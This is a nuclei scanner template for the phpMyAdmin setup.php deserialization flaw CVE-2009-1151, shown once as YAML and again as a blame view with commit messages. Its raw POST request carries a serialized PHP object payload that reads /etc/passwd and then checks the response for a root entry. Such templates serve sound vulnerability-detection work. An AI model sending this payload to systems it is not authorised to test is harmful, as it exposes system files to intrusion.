nuclei-templates/cves/2009/CVE-2009-1151.yaml

id: CVE-2009-1151

info:
  name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
  author: princechaddha
  severity: high
  description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2009-3/
    - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
  tags: cve,cve2009,phpmyadmin,rce,deserialization

requests:
  - raw:
      - |
        POST /scripts/setup.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
template updates 2021-04-14 12:04:59 +00:00			`id: CVE-2009-1151`

			`info:`
			`name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability`
			`author: princechaddha`
			`severity: high`
Updates across many templates for clarity, spelling, and grammar. 2021-09-05 21:13:45 +00:00			`description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.`
Changes fixes/around dynamic attributes ("additional-fields") Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:17:27 +00:00			`reference:`
			`- https://www.phpmyadmin.net/security/PMASA-2009-3/`
			`- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433`
Adding missing tags 2021-05-12 19:24:59 +00:00			`tags: cve,cve2009,phpmyadmin,rce,deserialization`
template updates 2021-04-14 12:04:59 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /scripts/setup.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept-Encoding: gzip, deflate`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`

			`action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: regex`
			`regex:`
Updates across many templates for clarity, spelling, and grammar. 2021-09-05 21:13:45 +00:00			`- "root:.*:0:0:"`